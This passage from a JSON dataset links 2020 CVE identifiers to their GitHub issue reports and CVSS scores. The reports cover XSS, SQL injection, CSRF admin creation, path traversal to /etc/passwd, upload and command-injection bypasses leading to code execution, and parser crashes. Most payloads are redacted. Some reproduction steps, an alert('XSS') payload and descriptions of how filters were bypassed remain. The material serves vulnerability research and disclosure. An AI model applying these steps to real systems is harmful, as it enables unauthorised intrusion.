        "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/2",
        "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/2",
        "Repo_new": "cbkhwx/cxuucmsv3",
        "Issue_Created_At": "2020-11-20T09:42:01Z",
        "description": "\u540e\u53f0 xss \u653b\u51fb. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-29250",
        "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/3",
        "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/3",
        "Repo_new": "cbkhwx/cxuucmsv3",
        "Issue_Created_At": "2020-11-20T14:15:25Z",
        "description": "xss vulnerability exists in FILETAG file. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-29280",
        "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/13",
        "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/13",
        "Repo_new": "victoralagwu/cmssite",
        "Issue_Created_At": "2020-07-05T09:47:18Z",
        "description": "SQL Injection in FILETAG form. Hi, I've found a UNION SQL Injection into the search parameter of APITAG file. The vulnerable columns are the NUMBERTAG rd NUMBERTAG th NUMBERTAG th and NUMBERTAG th as you can see in the screen below. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-29315",
        "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/255",
        "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/255",
        "Repo_new": "zoujingli/thinkadmin",
        "Issue_Created_At": "2020-11-26T16:52:43Z",
        "description": "There is a stored xss vulnerability in versions NUMBERTAG An issue was discovered in APITAG version NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point all version : URLTAG APITAG FILETAG NUMBERTAG choose \u7cfb\u7edf\u7ba1\u7406(system management) > APITAG Management) > APITAG users) FILETAG NUMBERTAG input Poc in the nickname and save FILETAG APITAG complete NUMBERTAG FILETAG NUMBERTAG FILETAG Maybe there are more stored XSS",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-29394",
        "Issue_Url_old": "https://github.com/GENIVI/dlt-daemon/issues/274",
        "Issue_Url_new": "https://github.com/covesa/dlt-daemon/issues/274",
        "Repo_new": "covesa/dlt-daemon",
        "Issue_Created_At": "2020-11-28T03:15:46Z",
        "description": "stack buffer overflow in dlt_filter_load. Summary An exploitable buffer overflow vulnerability exists in the dlt daemon, A specially crafted Filter file can cause a buffer overflow, resulting in multiple corruptions and potentially code execution. An attacker can provide a specially crafted file to trigger this vulnerability. Details A buffer overflow in the dlt_filter_load function in dlt_common.c in dlt daemon allows arbitrary code execution via an unsafe usage of fscanf, because it does not limit the number of characters to be read in a format argument. Affected NUMBERTAG dlt receive NUMBERTAG dlt sortbytimestamp NUMBERTAG dlt convert APITAG ERRORTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-29437",
        "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/695",
        "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/695",
        "Repo_new": "orangehrm/orangehrm",
        "Issue_Created_At": "2020-11-28T19:16:33Z",
        "description": "security issue. Hi, I would like to report a security issue, can I please get a point of contact? Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-29456",
        "Issue_Url_old": "https://github.com/ciur/papermerge/issues/228",
        "Issue_Url_new": "https://github.com/ciur/papermerge/issues/228",
        "Repo_new": "ciur/papermerge",
        "Issue_Created_At": "2020-11-27T21:37:03Z",
        "description": "Stored Cross Site Scripting (XSS). Description Improper validation of user input leads to stored cross site scripting (XSS) or HTML injection in the papermerge web application. If a user inserts APITAG or HTML code into a folder name, the specified payload will be executed on opening the folder. Expected Specifying potentially malicious client side code should not be executed in the web application by the browser. Actual The browser successfully executes the specified JS or HTML payloads if the newly created folder is opened. Steps to reproduce NUMBERTAG Login to papermerge web application URLTAG NUMBERTAG Create a new folder named \"XSS Folder APITAG alert('XSS'); APITAG \" without the quotes NUMBERTAG Open the newly created folder with XSS payload and experience a APITAG XSS popup saying \"XSS\". Impact This may allow an attacker to steal sensitive session information or CSRF tokens for executing a Cross Site Request Forgery attack. Likelihood Authentication is required to access the papermerge web application. Recommendation Do not trust any user input and validate inputs properly. See URLTAG Info: Tested in the publicly available demo page. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-29561",
        "Issue_Url_old": "https://github.com/riscv-boom/riscv-boom/issues/504",
        "Issue_Url_new": "https://github.com/riscv-boom/riscv-boom/issues/504",
        "Repo_new": "riscv-boom/riscv-boom",
        "Issue_Created_At": "2020-11-30T11:29:50Z",
        "description": "Misaligned load reserve should not set reservation. APITAG Type of issue : bug report APITAG APITAG Impact : rtl refactoring APITAG Development Phase : proposal Other information APITAG APITAG Misaligned load reserve instruction should not set reservation. However boom set reservation even after misaligned load exception. APITAG makes the bug case binary ( APITAG ). Logs of both boom and rocket are also included. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-29587",
        "Issue_Url_old": "https://github.com/simplcommerce/SimplCommerce/issues/969",
        "Issue_Url_new": "https://github.com/simplcommerce/simplcommerce/issues/969",
        "Repo_new": "simplcommerce/simplcommerce",
        "Issue_Created_At": "2021-01-13T12:36:40Z",
        "description": "Admin dashboard vulnerable to DOM XSS. Opened this issue because there is not a security advisory or a response from the repo maintainers after sending a report by email. The POC described here used the docker continuous deployment instance ( URLTAG POC The following POC is just an example of many others that are prone to DOM XSS. To better understand and see a more detailed explanation of what is, please see the following link: URLTAG Using the user register page and the input is the Full Name field at the register page ( URLTAG > Payload APITAG alert NUMBERTAG APITAG FILETAG An user with the name _ APITAG alert NUMBERTAG APITAG _ is registered and stored to the database. This payload appears to not be triggered while browsing through the site but when admin needs to remove this user, the payload is executed. Below is shown an example where to trigger our malicious payload at URLTAG FILETAG We can see the registered user and the payload in the full name field. Nothing anormal happens when loading the page. But when trying to remove the user and after clicking the remove button the script of the malicious payload is executed and the alert box appears. This behavior confirms the XSS vulnerability. It requires to click the remove button, but as soon as is clicked, the exploit is executed. Looking to the inspector from the dev tools, we can see the injected script in the Bootbox modal body . FILETAG In the APITAG code, this happens in the following line of code at URLTAG FILETAG When clicked the delete button , the function vm.user(delete) is executed. If we look for the FILETAG file ( FILETAG we can see of the function is doing. FILETAG At line NUMBERTAG the value of APITAG field is added directly to the bootbox modal without proper sanitization making it vulnerable to XSS. Also, at line NUMBERTAG a toast is launched when we confirm deleting the user and again APITAG is added to the toast. The same payload can be triggered twice if we follow this use case. Fixing the vulnerability As the FILETAG maintainer does not fix the XSS vulnerability, to protect the users of APITAG from being attacked is recommended to sanitize input before adding it to any bootbox modal or dialog . The following link explains the approach to validate user data URLTAG The next functions are just suggestions to validate input data. Upon your goals, you can choose the one(s) that best fit to your project: APITAG FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-29600",
        "Issue_Url_old": "https://github.com/eldy/awstats/issues/90",
        "Issue_Url_new": "https://github.com/eldy/awstats/issues/90",
        "Repo_new": "eldy/awstats",
        "Issue_Created_At": "2018-02-20T12:30:46Z",
        "description": "CVETAG question. See URLTAG To fix this issue I upgraded to the latest release NUMBERTAG dfsg NUMBERTAG ubuntu NUMBERTAG on my ubuntu NUMBERTAG Then I tried to open URLTAG it is still parsing /etc/passwd (even though only trying reading value pairs) and fails: > Warning: Syntax error line NUMBERTAG in file PATHTAG Config line is ignored. > Warning: Syntax error line NUMBERTAG in file PATHTAG Config line is ignored. > Warning: Syntax error line NUMBERTAG in file PATHTAG Config line is ignored. Surely it should not open absolut paths? The problem comes from this code, around line NUMBERTAG if ( APITAG ) { > my APITAG = APITAG APITAG > APITAG try to open an absolute path : APITAG NUMBERTAG if ( f APITAG && open(CONFIG, APITAG { > APITAG = APITAG > APITAG = ''; > if APITAG config: APITAG NUMBERTAG APITAG > } > else { > if APITAG to open config file: APITAG NUMBERTAG In my case, the server has a name, lets say APITAG it also has a DNS alias APITAG However there is no config for that domain in /etc/awstats, so it fails to find a config file it then reads a config file from the parameters and accepts a file that has an absolute path. Sure that should not be allowed? Workaround: comment out the above code. Question: what is the proper way to fix this?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-29607",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/96",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/96",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2020-12-01T18:26:57Z",
        "description": "Remote Code Execution via File Upload Restriction Bypass. Vulnerability Description I have observed that it is possible to upload php file on the system through manage files functionality which leads to compromise the system. As I'm able to upload malicious php file with APITAG extension, and able to execute php code on the server. Observation On line NUMBERTAG of APITAG , I observed that the application uses blacklist extensions to restrict the php malicious file which can be easily bypassed with APITAG extension. Steps to Reproduce NUMBERTAG Login into the application's admin panel NUMBERTAG Navigate to the APITAG NUMBERTAG Now upload the php file with APITAG extension, for e.g. APITAG . FILETAG NUMBERTAG After uploading the php file, navigate to the APITAG . FILETAG Mitigation Rename the uploaded files to some random filenames, remove the file extension and then append your allowed file extension. Whitelisted extension approach should be applied instead of blacklisting. Correct use of APITAG should be applied as shown below for preventing the php file execution in upload directory. APITAG Reference URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-29651",
        "Issue_Url_old": "https://github.com/pytest-dev/py/issues/256",
        "Issue_Url_new": "https://github.com/pytest-dev/py/issues/256",
        "Repo_new": "pytest-dev/py",
        "Issue_Created_At": "2020-09-03T09:21:46Z",
        "description": "Vulnerable Regular Expression in svnwc.py. Type of Issue Potential Regex Denial of Service APITAG Description The vulnerable regular expression is located in URLTAG The APITAG vulnerabilitiy of the regex is mainly due to the sub pattern (\\d+)\\s (\\S+) and can be exploited with the following string NUMBERTAG I think you can limit the input length or modify this regex.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-29657",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4244",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4244",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-09-29T00:45:00Z",
        "description": "Out of bound read in APITAG APITAG revision APITAG (latest master APITAG Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Execution steps APITAG Output ERRORTAG Expected behavior Please consider that the error line may be larger than the test case line number. The above \"try\" test case has just three lines, but the error happened on line NUMBERTAG a \"catch\" block is needed. ) The jerry_port_read_source (path_str_p, &source_size) called in the APITAG need to malloc more memory to locate an error happened out of the source_size.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35132",
        "Issue_Url_old": "https://github.com/leenooks/phpLDAPadmin/issues/130",
        "Issue_Url_new": "https://github.com/leenooks/phpldapadmin/issues/130",
        "Repo_new": "leenooks/phpldapadmin",
        "Issue_Created_At": "2020-12-01T15:05:22Z",
        "description": "XSS in FILETAG for NUMBERTAG A user can set a field to an XSS payload, which triggers when the confirmation screen for whether to confirm the change is raised. From FILETAG , say I have an attribute set to the following: FILETAG Then, say I am an admin and would like to change that field back: FILETAG When the field prompts me for a change, the payload is triggered. A user can log into user NUMBERTAG and request a change, then wait for an admin to try deleting the field, which would trigger the payload for that user. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-35176",
        "Issue_Url_old": "https://github.com/eldy/awstats/issues/195",
        "Issue_Url_new": "https://github.com/eldy/awstats/issues/195",
        "Repo_new": "eldy/awstats",
        "Issue_Created_At": "2020-12-09T14:40:12Z",
        "description": "path traversal flaw. Hi, It seems NUMBERTAG is not completely fixed in NUMBERTAG that is, even after CVETAG and CVETAG are fixed) Altering slightly the original example: URLTAG to e.g.: URLTAG ERRORTAG URLTAG ERRORTAG FILETAG ERRORTAG it is still parsing /etc/ . I'd expect it to only allow files within PATHTAG .conf. Like NUMBERTAG this requires that PATHTAG does not exist (e.g. in multi hosting environments with no default config).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35240",
        "Issue_Url_old": "https://github.com/hemantsolo/CVE-Reference/issues/1",
        "Issue_Url_new": "https://github.com/hemantsolo/cve-reference/issues/1",
        "Repo_new": "hemantsolo/cve-reference",
        "Issue_Created_At": "2021-01-08T02:46:00Z",
        "description": "CVETAG : Your example is not reproducible. Your example is not reproducible: >payload in APITAG Content\" APITAG doesn't have APITAG Content\" APITAG go to the URL: URLTAG APITAG the payload in Content: FILETAG on its form does not contain Content field > and the attacker can able to steal the cookie according to the crafted payload. In APITAG user cookies are not accessible from javascript. The httponly flag is enabled by default. URLTAG Or are you talking about admin functions (files admin_ .php)? P.S. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-35242",
        "Issue_Url_old": "https://github.com/balloonwj/flamingo/issues/47",
        "Issue_Url_new": "https://github.com/balloonwj/flamingo/issues/47",
        "Repo_new": "balloonwj/flamingo",
        "Issue_Created_At": "2020-11-27T10:59:59Z",
        "description": "There are security risks in the operation of the server on the database. issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. The related business corresponding to the method is the registered account. userid , username , nickname can be controlled, no filtering measures, and directly execute the entire SQL statement. Looking at the code, it is found that the client does not encrypt the transmission data, and the registration information is returned to the server in clear text. Therefore, it can be injected directly in the client registration window. ERRORTAG Poc payload: APITAG or APITAG FILETAG FILETAG FILETAG issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. newteaminfo can be controlled ERRORTAG Poc The client has an input length limit, but the defense of the client is invalid. Hard code the payload into the program. payload: APITAG FILETAG FILETAG issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. groupname can be controlled ERRORTAG Create a group chat function can trigger this function. FILETAG payload\uff1a APITAG The client has an input length limit, but the defense of the client is invalid. Hard code the payload into the program. Find the place where the client sends the json, and hard code the payload in. FILETAG FILETAG issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. ERRORTAG Poc payload: APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35284",
        "Issue_Url_old": "https://github.com/balloonwj/flamingo/issues/48",
        "Issue_Url_new": "https://github.com/balloonwj/flamingo/issues/48",
        "Repo_new": "balloonwj/flamingo",
        "Issue_Created_At": "2020-12-01T06:20:12Z",
        "description": "Directory traversal vulnerability exists in uploaded and downloaded files. Directory traversal Through code audit, it is found that the file download function in flamingo has a problem with directory traversal. Through this vulnerability, files can be downloaded anywhere on the server through the directory. Test environment CODETAG Vulnerability analysis Flamingo is a C/S mode communication APITAG A sends the file to user B. The server saves the file in A specific folder of the server and waits for User B to receive it. After User B sends the receive request, the server sends the corresponding file to user B. When uploading files, use the result of file md5 encoding as the file name (unfortunately, the encryption process is on the client side). The base directory of the cache file is hard coded in the configuration file, and the corresponding file path is directly spliced \u200b\u200bthrough the base directory and the md5 result. The file has no identification for a specific user, all files exist together, and there is no distinction between different users (that is, the server does not know who the file belongs to, and it can be downloaded as long as the correct file path is provided to the server). Poc From the simple analysis above, it can be seen that this file transfer function has a lot of security issues. Only the most serious problems are demonstrated here. It can be seen from the declaration of the APITAG function in APITAG APITAG Since the download path is directly spliced \u200b\u200bby the base directory and the md5 result, as long as the file name can be controlled, the file name of the form PATHTAG can be used to achieve directory traversal and download any file . Flamingo's problem is that MD5 encryption is done on the client side, and because the communication protocol is open source, it is easy to forge. Find the location where the client sends the download command and tamper with the file name. Add the following statement to the APITAG FILETAG FILETAG FILETAG FILETAG During the test, it is found that when the tampered file path does not exist, the server will first create the file, then write the contents of the sent file, and then download it for the recipient.So using this vulnerability can also achieve arbitrary location write (can be multi level directory traversal). FILETAG Send the file again APITAG file is written on Desktop. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35337",
        "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/24",
        "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/24",
        "Repo_new": "thinksaas/thinksaas",
        "Issue_Created_At": "2020-12-03T10:11:46Z",
        "description": "Post Auth SQL injection vulnerability in PATHTAG SQL\u6ce8\u5165. Details can be retrived in FILETAG Author of the vuln: Qianxin, Network Security Department, Product Safety Team ( Unc1e ) PATHTAG \u7684title\u53c2\u6570\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e CODETAG Will cause a delay of NUMBERTAG seconds FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35346",
        "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/4",
        "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/4",
        "Repo_new": "cbkhwx/cxuucmsv3",
        "Issue_Created_At": "2020-12-04T09:19:47Z",
        "description": "A xss vulnerability was discovered in cxuucms NUMBERTAG There is a Persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of APITAG POC ERRORTAG Vulnerability trigger point URLTAG When attacker access system settings all content add. Write poc in statcode form which framed with red line and then save the form. Then the content will be save and the article will be published. FILETAG FILETAG Then view the article webpage named test xss in home page , XSS vulnerability is triggered successfully. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-35347",
        "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/5",
        "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/5",
        "Repo_new": "cbkhwx/cxuucmsv3",
        "Issue_Created_At": "2020-12-06T05:10:25Z",
        "description": "There is one CSRF vulnerability that can add the administrator account.. Title : There is one CSRF vulnerability in cxuucms3 that can add the administrator account Description : After the administrator logged in, open the following page, an administrator acount will be created. And attacker an log in to the background using the created account and password. Poc\uff1a APITAG Submuit request CODETAG files : PATHTAG FILETAG PATHTAG FILETAG Suggest \uff1a Verify referer or token before submitting request.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35380",
        "Issue_Url_old": "https://github.com/tidwall/gjson/issues/192",
        "Issue_Url_new": "https://github.com/tidwall/gjson/issues/192",
        "Repo_new": "tidwall/gjson",
        "Issue_Created_At": "2020-12-07T02:55:43Z",
        "description": "panic: runtime error: slice bounds out of range. payload: func APITAG { APITAG := APITAG APITAG APITAG } goroutine NUMBERTAG running]: PATHTAG NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG b2) PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG aa NUMBERTAG b NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG fa PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG aa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG aa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG da NUMBERTAG c NUMBERTAG a NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ac PATHTAG NUMBERTAG c NUMBERTAG da NUMBERTAG c NUMBERTAG a NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ccb PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35381",
        "Issue_Url_old": "https://github.com/buger/jsonparser/issues/219",
        "Issue_Url_new": "https://github.com/buger/jsonparser/issues/219",
        "Repo_new": "buger/jsonparser",
        "Issue_Created_At": "2020-12-07T02:14:37Z",
        "description": "panic: runtime error: slice bounds out of range. payload: func APITAG { APITAG := APITAG s, _ := APITAG APITAG APITAG } panic: runtime error: slice bounds out of range NUMBERTAG goroutine NUMBERTAG running]: PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG fdb PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7d NUMBERTAG e NUMBERTAG afb NUMBERTAG c NUMBERTAG d7dc0, ...) PATHTAG NUMBERTAG a6 PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7e NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG PATHTAG NUMBERTAG e",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35382",
        "Issue_Url_old": "https://github.com/craigrodway/classroombookings/issues/27",
        "Issue_Url_new": "https://github.com/craigrodway/classroombookings/issues/27",
        "Repo_new": "craigrodway/classroombookings",
        "Issue_Created_At": "2020-12-08T13:17:44Z",
        "description": "Classbooking NUMBERTAG has SQL injection. After the administrator logs in, when adding a new user, choose to import the csv file, and there is SQL injection in the csv file username. FILETAG The csv file is as follows: ERRORTAG If mysql has writable permissions\uff0cthis csv file will create a new phpinfo file in the website directory. the POST file is: ERRORTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-35437",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/880",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/880",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2020-12-12T19:10:41Z",
        "description": "PATHTAG stored xss vulnerability. Hello there: I found a stored xss vulnerability in PATHTAG Reproduce through the avatar FILETAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35470",
        "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/14087",
        "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/14087",
        "Repo_new": "envoyproxy/envoy",
        "Issue_Created_At": "2020-11-18T23:58:28Z",
        "description": "Wrong %DOWNSTREAM_REMOTE_ADDRESS% logged when using proxy protocol with tcp proxy. When using proxy protocol as a listener filter, tcp proxy as the network filter, and access logging, the wrong downstream address is logged. The logged address should be the one from the proxy protocol header on the connection, but the direct peer address is logged instead.",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35471",
        "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/14113",
        "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/14113",
        "Repo_new": "envoyproxy/envoy",
        "Issue_Created_At": "2020-11-20T05:41:27Z",
        "description": "crash when udp packet size large than NUMBERTAG crash when udp packet size large than NUMBERTAG Description envoy crash when udp packet size large than NUMBERTAG Is there any way to modify the packet size limit? Repro steps start envoy crash shen receive packget that size large than NUMBERTAG ERRORTAG Config yaml admin: access_log_path: /tmp/admin_access.log address: socket_address: protocol: TCP address NUMBERTAG port_value NUMBERTAG static_resources: listeners: name: listener_udp reuse_port: true address: socket_address: protocol: UDP address NUMBERTAG port_value NUMBERTAG listener_filters: name: APITAG typed_config: ' APITAG APITAG stat_prefix: service cluster: conf_jira_udp clusters: name: conf_jira_udp connect_timeout NUMBERTAG s type: STATIC lb_policy: ROUND_ROBIN load_assignment: cluster_name: conf_jira_udp endpoints: lb_endpoints: endpoint: address: socket_address: address: APITAG port_value NUMBERTAG Logs ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35476",
        "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/2051",
        "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/2051",
        "Repo_new": "opentsdb/opentsdb",
        "Issue_Created_At": "2020-11-18T09:02:48Z",
        "description": "APITAG NUMBERTAG Remote Code Execution. During a Pentest we found a remote code execution vulnerability in APITAG NUMBERTAG and below using command injection in the yrange parameter (other parameters might be vulnerable as well) When passing the payload via one of the parameters it is written to a gnuplot file in the /tmp directory and the gnuplot file is executed by APITAG via the FILETAG shell script. There was an attempt to block command injections by blocking back ticks but we were able to bypass it: PATHTAG ERRORTAG Bypass Payload: APITAG APITAG URLTAG The gnuplot file created in the temp directory by APITAG would look something like this: ERRORTAG When executed by APITAG FILETAG the FILETAG file will be written to the temp directory.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
